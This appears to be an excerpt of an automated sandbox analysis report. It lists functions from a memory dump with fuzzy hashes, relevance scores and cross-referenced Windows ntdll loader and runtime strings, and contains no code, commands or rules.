Opcode Fuzzy Hash: d076754bba49c1947adb61f51324d0ace096e7dcb85459843de2a47a5dc92a4b
Instruction Fuzzy Hash: 3961C237911245DFDB12EB8DD485E34BBF8FB94920B4D802AF40E5F311DA24A885CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 019B3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON

Download Yara Rule

Strings

Kernel-MUI-Language-Allowed, xrefs: 019B3DC0
Kernel-MUI-Number-Allowed, xrefs: 019B3D8C
Kernel-MUI-Language-SKU, xrefs: 019B3F70
Kernel-MUI-Language-Disallowed, xrefs: 019B3E97
WindowsExcludedProcs, xrefs: 019B3D6F

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 910303942a9eddd1cf8aee83f1c4f6948b9e598b36acff080d538ad7e7dd3a97
Instruction ID: 4d7ea2a862d9dff1cf53e515a9c969412c3a4ce7215b8da8c7bc111c6869e500
Opcode Fuzzy Hash: 910303942a9eddd1cf8aee83f1c4f6948b9e598b36acff080d538ad7e7dd3a97
Instruction Fuzzy Hash: D7F14D72D00619EFCB12DF98DA80EEEBBB9FF58750F14046AE509A7251E7349E01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 019CFDA0, Relevance: 5.4, Strings: 4, Instructions: 380COMMON

Download Yara Rule

Strings

Status: 0x%08lx, xrefs: 01A14B0E
minkernel\ntdll\ldrfind.c, xrefs: 01A148F8, 01A14B1F
DLL name: %wZ, xrefs: 01A148E7
LdrpSearchPath, xrefs: 01A148EE, 01A14B15

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID: DLL name: %wZ$LdrpSearchPath$Status: 0x%08lx$minkernel\ntdll\ldrfind.c
API String ID: 0-4206496468
Opcode ID: 4be039e4bdcc7ab21420bafb5bc94ebf90609434fd548d8f99eced93601df101
Instruction ID: b107e7fc3eb694270658e793ffa4e29880bdfc3d50b9c9d76cf9a387d8ba6087
Opcode Fuzzy Hash: 4be039e4bdcc7ab21420bafb5bc94ebf90609434fd548d8f99eced93601df101
Instruction Fuzzy Hash: 88D1D875A002169BDF24DF5DC490BBEBBB2FF99B00F18801DE989AB345D731A842CB51

Uniqueness

Uniqueness Score: -1.00%

Function 019D8E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON

Download Yara Rule

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 01A1932A
LdrpFindDllActivationContext, xrefs: 01A19331, 01A1935D
minkernel\ntdll\ldrsnap.c, xrefs: 01A1933B, 01A19367
Querying the active activation context failed with status 0x%08lx, xrefs: 01A19357

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 068e17e3dd13cf476a9e0b7294dafd87655ce4321dedea427c78d0d8c5884b4b
Instruction ID: c56e998904d488465236b4f54fb72658c833a612b941770297438e6a1984e62e
Opcode Fuzzy Hash: 068e17e3dd13cf476a9e0b7294dafd87655ce4321dedea427c78d0d8c5884b4b
Instruction Fuzzy Hash: 23411735A003159EDF36BA1CC89DA7AB6B8BB41646F09C529D90C57153EB70BD808BE1

Uniqueness

Uniqueness Score: -1.00%

Function 019B8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON

Download Yara Rule

Strings

LdrpDoPostSnapWork, xrefs: 01A09C1E
minkernel\ntdll\ldrsnap.c, xrefs: 01A09C28
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01A09C18

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 315304d7e61e672a760727c44f654cf1ed225859ac2c54eada891121c9c06153
Instruction ID: 06fd26f7bc724b7a23a8830653386c56697d299a8280f7873746ccc9c25e7588
Opcode Fuzzy Hash: 315304d7e61e672a760727c44f654cf1ed225859ac2c54eada891121c9c06153
Instruction Fuzzy Hash: 4A91F171A0020AEFDF19DF59D6C1AFAB7BDFF88315B044069DA0DAB241DB30A941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 019B7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON

Download Yara Rule

Strings

LdrpCompleteMapModule, xrefs: 01A09898
minkernel\ntdll\ldrmap.c, xrefs: 01A098A2
Could not validate the crypto signature for DLL %wZ, xrefs: 01A09891

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 986b00b8f0e1cce7c7066f2484c448d879f66d9cd233e51bebaadfd4d58085e0
Instruction ID: 2378b6ca753972589965328381649185a308fd8de5a24bbee28392376735640a
Opcode Fuzzy Hash: 986b00b8f0e1cce7c7066f2484c448d879f66d9cd233e51bebaadfd4d58085e0
Instruction Fuzzy Hash: 99510331A04745DBE72ACBACCAC4BAA7BE4AF84714F040659E9599B3E2D734FD00CB51

Uniqueness

Uniqueness Score: -1.00%

Function 019AE620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON

Download Yara Rule

Strings

InstallLanguageFallback, xrefs: 019AE6DB
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 019AE68C
@, xrefs: 019AE6C0

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 88e657892ad50c1457fec78d583e05e4f5b8585acda8a7b7b605dee28cb1bfa2
Instruction ID: 4eb7051de84ddb77fe6bce5b96de58b19480d6a1edf3676fa9e91aa41818cb93
Opcode Fuzzy Hash: 88e657892ad50c1457fec78d583e05e4f5b8585acda8a7b7b605dee28cb1bfa2
Instruction Fuzzy Hash: 785104729043069BD716DF28D440ABBB7E8BF88714F45092EF989D7291F731D908CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01A251BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON

Download Yara Rule

Strings

Legacy, xrefs: 01A25226
UEFI, xrefs: 01A2521D

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: be75e2dbb68fa072682fb086df96a7ea45e080a10cadbfc0e6e879ecdc4d9aad
Instruction ID: 3f03d132364d7d231243ad544353ba082baffe95f51a133a16e4b26c5fec3640
Opcode Fuzzy Hash: be75e2dbb68fa072682fb086df96a7ea45e080a10cadbfc0e6e879ecdc4d9aad
Instruction Fuzzy Hash: A55149B1E006299FDB25DFA9C990AEEBBF9BF48700F14402DE649EB291D6719900CB50

Uniqueness

Uniqueness Score: -1.00%

Function 019CB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 019CB9A5

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: e02c58eeb6548efd728cf00742407970fe3f2e757a768f19f71f1db9259d3a53
Instruction ID: 7a73761b31897ae83a7279ac0183b3229c038c64ea99c9f83fe78f8f28be45c2
Opcode Fuzzy Hash: e02c58eeb6548efd728cf00742407970fe3f2e757a768f19f71f1db9259d3a53
Instruction Fuzzy Hash: 30515C71608341CFC721CF6DC48192AFBE9FB88A94F14496EE6CA87355D731E844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 019AB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON

Download Yara Rule

APIs

_vswprintf_s.LIBCMT ref: 01A048AD

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 1b8ca39f4c45bf0120e22dad74dd4e9f3a205d41ff879691d0f72b8e047f3ba8
Instruction ID: 45e1ab8fbd8eed0841ac6e7f0aea52742abde9724adf59eb7f5e0505b5a000fb
Opcode Fuzzy Hash: 1b8ca39f4c45bf0120e22dad74dd4e9f3a205d41ff879691d0f72b8e047f3ba8
Instruction Fuzzy Hash: 1951D071D0025A8EEB33CF68D844BAEBBF0BF48710F1445ADDA59AB2C2D7704A45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 019D2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON

Download Yara Rule

Strings

PATH, xrefs: 019D2642, 019D2691

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: d5484aff0b124e1fb439e9aaa042bd3e16ffcff64d80035aaa8bb3608947dceb
Instruction ID: b175d3d99db3830725ebc70aa5d8c925daab5e605951eeba29c01336136899d0
Opcode Fuzzy Hash: d5484aff0b124e1fb439e9aaa042bd3e16ffcff64d80035aaa8bb3608947dceb
Instruction Fuzzy Hash: 6DC1B075E00219DFDB25DF99D880BAEBBF5FF88740F45802AE509BB250E734A941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 019DFAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON

Download Yara Rule

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 01A1BE0F

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 8625521f05ed02441bd1a1806c346f0d1597de36ca055a32c74d81a0d73ea961
Instruction ID: b751f075e3c9dac2b210b9a9e255354443f1e4619b468e03aec77a21080ec89e
Opcode Fuzzy Hash: 8625521f05ed02441bd1a1806c346f0d1597de36ca055a32c74d81a0d73ea961
Instruction Fuzzy Hash: 68A1F371B00606CBEB25DF78C451BBAB7B5AF88710F048569E90BDB685DB34D942CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 019A2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 019FFA4A

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 07601fc6506c7ae2966f439ffaee40a97a781846a711099bb0083b066dc5d05c
Instruction ID: cd961c77f557b4b97bbffcd1d1c1c6125135aa29061ff71786410f29ecbca80a
Opcode Fuzzy Hash: 07601fc6506c7ae2966f439ffaee40a97a781846a711099bb0083b066dc5d05c
Instruction Fuzzy Hash: 8C612432A00605AFDB22DF6CC844B7E7BE8EB44714F240669E61D972C1D734AD8987D1

Uniqueness

Uniqueness Score: -1.00%

Function 01A70EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

`, xrefs: 01A70F16

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: b585d6b350d8861f3a0937bbda35fca685604ccbcb123b2ebe3060d32182d58b
Instruction ID: c01bb650b2aef742a17dcc63138f1c6fe0bb693bf04a97a3d95c6492b2ca0830
Opcode Fuzzy Hash: b585d6b350d8861f3a0937bbda35fca685604ccbcb123b2ebe3060d32182d58b
Instruction Fuzzy Hash: 2351BE713043429FD325DF28DD84B1BBBE9EBC5714F04092CFA9697291D674EA06CB62

Uniqueness

Uniqueness Score: -1.00%

Function 019DF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

@, xrefs: 019DF124

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: e502630b576cb03ed46b6cd8d01a24dfdd64b09bc6f974d37fe60ddca89e7b9e
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: F7518F726047119FC321DF29C841A67BBF8FF88710F00892DFA9A87650E774E904CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01A23540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 01A2358F

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: b8868a55fb113a4392c53ae5330c95799cffda5a70e446945cd4ca407354d888
Instruction ID: df84da227754672b28babc3d0abeb1b63cb28495e65e6fd0a10efd1f924a6fec
Opcode Fuzzy Hash: b8868a55fb113a4392c53ae5330c95799cffda5a70e446945cd4ca407354d888
Instruction Fuzzy Hash: 8C4131B1D0052DAADF21DA54CC84FAEB77CAF45714F0045A5EA09AB240DB749E888FA4

Uniqueness

Uniqueness Score: -1.00%

Function 01A23884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 01A238B4

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: d8bc4f3fe21a42c6768df75c6aa6a1ac7abb511e7777192004243eb7c59176a8
Instruction ID: 0a4c158a2a04df3d7ebe22bc9b0f28fc5e576cbc6156d9d185a87e705a8099bd
Opcode Fuzzy Hash: d8bc4f3fe21a42c6768df75c6aa6a1ac7abb511e7777192004243eb7c59176a8
Instruction Fuzzy Hash: A4312632A0152AAFDF16DB5DC955D6BB7B4FF86B20F014129E918A7240D6349E00CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 019DD294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

@, xrefs: 019DD303

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: aed96787c1cbb2095348e760a0d45353a41d09d03ae913c7a9b5b02dbc7bae5d
Instruction ID: d7ded9efba870d4fd19783e6765a574193166237315cb2fcb8b5da1cab649339
Opcode Fuzzy Hash: aed96787c1cbb2095348e760a0d45353a41d09d03ae913c7a9b5b02dbc7bae5d
Instruction Fuzzy Hash: 4B318FB5508305AFC721DF68C984A6BFBE8EBD5658F40492EF99983290DA34DD04CB92

Uniqueness

Uniqueness Score: -1.00%

Function 019B1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

WindowsExcludedProcs, xrefs: 019B1BC5

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 5e789111cb37dc1a349258ec38c53894c5aab80f41dd0d38fe83a384be9f7ec4
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 7E21F836901129ABDB22DE99EA94F9B7BADAF80B61F054435FA4C8B200D630DC0087E0

Uniqueness

Uniqueness Score: -1.00%

Function 019CF716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 019CF73F

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 4ea59732c4bdf6469221729b1ad2d8fa4f2930825466ba3c6b6de76e4ae2907f
Instruction ID: eae6d0016bb5cdc3503ed1ede6f54714f39526976b46f19c0a48a30a3a8b5179
Opcode Fuzzy Hash: 4ea59732c4bdf6469221729b1ad2d8fa4f2930825466ba3c6b6de76e4ae2907f
Instruction Fuzzy Hash: FE119035304B028BEB254F1D8490B36769BEB85F25F25492EE5EDCB791DB70C8418343

Uniqueness

Uniqueness Score: -1.00%

Function 01A58DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

Strings

Critical error detected %lx, xrefs: 01A58E21

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: a2093418fb42a6cf77087aaf1b370807ecf0fe300b464199674721ecfb261df3
Instruction ID: 78baa17c815fa044975af5d6728670a35aa97b83ca88995340abd3dfe8f4f711
Opcode Fuzzy Hash: a2093418fb42a6cf77087aaf1b370807ecf0fe300b464199674721ecfb261df3
Instruction Fuzzy Hash: E4116DB1D15348EBDF25DFA985057DCBBF0BB54714F24425DE929AB292C3384601DF14

Uniqueness

Uniqueness Score: -1.00%

Function 01A3FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 01A3FF60

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 9675c567ddf3067e171eb1cb9769dee9ae739497c1b0a06a598619e27d90f617
Instruction ID: 916c7aea44d230e04a90ce87ffa824c8cd132805b09fe788c0b06393e4b0f8f6
Opcode Fuzzy Hash: 9675c567ddf3067e171eb1cb9769dee9ae739497c1b0a06a598619e27d90f617
Instruction Fuzzy Hash: C6110475920144FFDF22EB94C949F987BB1FF84704F148058F6086B161C7399980DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01A75BA5, Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c67b085345e9444f65ada008641d538fbd20de1ea4d3b1344fbfe16964c094bc
Instruction ID: 1247efc9611828eff1065c3859c3085d089cec23de6fadefa07d53d9fa2686b2
Opcode Fuzzy Hash: c67b085345e9444f65ada008641d538fbd20de1ea4d3b1344fbfe16964c094bc
Instruction Fuzzy Hash: 5D424A75D00629CFEB25CF68CC80BA9BBB1FF49314F1481AAD94DAB242D7349A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 019C4120, Relevance: .4, Instructions: 444COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a305bd9d9187dedd6cc07f2686adbfb92caf453a034a37a6436fd25f1041c998
Instruction ID: bcad07e8406a3aa988b96ba94814991f76544c159949e4ad5acbc29d0c7891ce
Opcode Fuzzy Hash: a305bd9d9187dedd6cc07f2686adbfb92caf453a034a37a6436fd25f1041c998
Instruction Fuzzy Hash: 7BF17A706083518FD725CF19C4A0A7ABBE5BF98B14F54492EF9CACB290E734D891CB52

Uniqueness

Uniqueness Score: -1.00%

Function 019D20A0, Relevance: .4, Instructions: 420COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4fce1b39984ae3bf2c20d0df2edb31815c399eb86de97233cbcb4452f59a5dd
Instruction ID: 7f981b5b22eb1295405fc31c26f5401f186af0c2f720f8abece7aa365d203a70
Opcode Fuzzy Hash: d4fce1b39984ae3bf2c20d0df2edb31815c399eb86de97233cbcb4452f59a5dd
Instruction Fuzzy Hash: 14F1A375A083419FDB26CF2CC440B6ABBE6BFC6714F08C91DEA999B245D734D841CB92

Uniqueness

Uniqueness Score: -1.00%

Function 019BD5E0, Relevance: .4, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b893a6e6943f482ef63d331db874b5a178002c4dd596b2b7b60983a420a8d4a4
Instruction ID: 48464b7dc176b57a999ac23910d610f3c6a4ff2b9117b3331b82bae471717ed0
Opcode Fuzzy Hash: b893a6e6943f482ef63d331db874b5a178002c4dd596b2b7b60983a420a8d4a4
Instruction Fuzzy Hash: C1E1C074A0025ACFEB25CB58CAC4BE9BBF5BF85318F0501A9D90D97291DB34A981CF52

Uniqueness

Uniqueness Score: -1.00%

Function 019B849B, Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2709d3261749d469d8ad25ed50b8f4ce94f893c31854921c7f0b2b3fcc79de7e
Instruction ID: 10a55c1d07cebad2f9cc55c6f054357ff77aa916488262b9d4b7758cf85deeac
Opcode Fuzzy Hash: 2709d3261749d469d8ad25ed50b8f4ce94f893c31854921c7f0b2b3fcc79de7e
Instruction Fuzzy Hash: E9B17E74E00209DFDB15DFE9CAC4AEEBBB9BF89704F104529E509AB245DB70A941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 019D513A, Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fd2da753498b38cef29c407d1dcd0f7da1297ed6821542cc17ada1470f4400a
Instruction ID: 92cae557885f9c6226c672b88cf3b90f8d9f4f4b54b4ccbc48cd8de5b8788009
Opcode Fuzzy Hash: 5fd2da753498b38cef29c407d1dcd0f7da1297ed6821542cc17ada1470f4400a
Instruction Fuzzy Hash: 5DC114755093818FE355CF28C580A5AFBF1BF88304F188A6EF9998B392D771E945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 019D03E2, Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ff3777643020f588d8d05ca6f2059bfa1608916ea8c87c56af4dfc60253c496
Instruction ID: f87c825b597f0ab4afdbeba415a83979e13961257f4ca9bfad4c1154517dda79
Opcode Fuzzy Hash: 1ff3777643020f588d8d05ca6f2059bfa1608916ea8c87c56af4dfc60253c496
Instruction Fuzzy Hash: 78914731E00215AFEF329BACC844FBD7BE4AB05B24F094265FA15AB2D1EB749C40C781

Uniqueness

Uniqueness Score: -1.00%

Function 019AC600, Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ac24d96315c0d86c22c0ec1ff4372bdd4df86fdb8719b73c0e70fc9e3f53203
Instruction ID: 5699bc896b54e26d6ff848ef37ed61792cad67b3e6b06a6416c9945d51ae19d1
Opcode Fuzzy Hash: 4ac24d96315c0d86c22c0ec1ff4372bdd4df86fdb8719b73c0e70fc9e3f53203
Instruction Fuzzy Hash: 2B81B8766082028FDB26CF98C880A7B77E5FB84354F58581EEE45DB249D730ED45CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01A26DC9, Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: 9ef024a9b05c0a37a2e5512aafcd0372105c4cc7cf1ff0fcee7cdfeab9158cdf
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: 80716071A00219EFDB11DFA9C944EEEBBB9FF98710F104469E909E7250DB34EA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01A3B8D0, Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f613c3e88ab0a07516b1fce7336dddfdc5fd1805587366b16b671f88664bd657
Instruction ID: bcc3ef40486648a1705888cc126fcce9cfb7e641b947e7854894261f74038fe4
Opcode Fuzzy Hash: f613c3e88ab0a07516b1fce7336dddfdc5fd1805587366b16b671f88664bd657
Instruction Fuzzy Hash: 8171F132600B06AFE732CF19C845F56BBF6EBC0724F154928F659872A0DB71E941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 019A52A5, Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dda1a332de073dfc859bbe51a145baa1aa80de00176b893b8e510ecfbc0d4d0b
Instruction ID: 564125d263811483f3c00389eb894866c68084785104975c7dd27d0f402382d5
Opcode Fuzzy Hash: dda1a332de073dfc859bbe51a145baa1aa80de00176b893b8e510ecfbc0d4d0b
Instruction Fuzzy Hash: 7051EF70205342AFE722DF68C944B67BBE8FF94714F14491EF89987691E770E844CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 019D2AE4, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9d66f8735f59631ce8ada9d89754dd79f4e1db82b783a12ef2e0f3313b21da7
Instruction ID: e28a0027387216f6e5afe74853010f4931fa3f9c99b8678f2c7c11672314d6f3
Opcode Fuzzy Hash: b9d66f8735f59631ce8ada9d89754dd79f4e1db82b783a12ef2e0f3313b21da7
Instruction Fuzzy Hash: BD51C27AE001158FCB19CF1CC4809BDB7B1FF89701719C45AE85A9B315D778AE81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 019CDBE9, Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3b096ef30c040324d756e03bb75d685fea509f78452396688f6aaddde525264
Instruction ID: 80118549d1586ff9fd33500833b9f4268e6b1e603d63f594a0631a605a6777c8
Opcode Fuzzy Hash: c3b096ef30c040324d756e03bb75d685fea509f78452396688f6aaddde525264
Instruction Fuzzy Hash: CF518D71E01606DBCB14CFA8C480AAEBBF5BB48710F24856ED599AB345EB31A944CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 019BEF40, Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: 5c11bc5d666747bf62554d97f7726d6e9b3c01c902d0c19f65a93e3a5322605e
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 6E510030E04249DFEB25CB6CC6C4BEEBBF9AF05314F1881A8D54997292C375A989C791

Uniqueness

Uniqueness Score: -1.00%

Function 01A7740D, Relevance: .1, Instructions: 141COMMON

Download Yara Rule

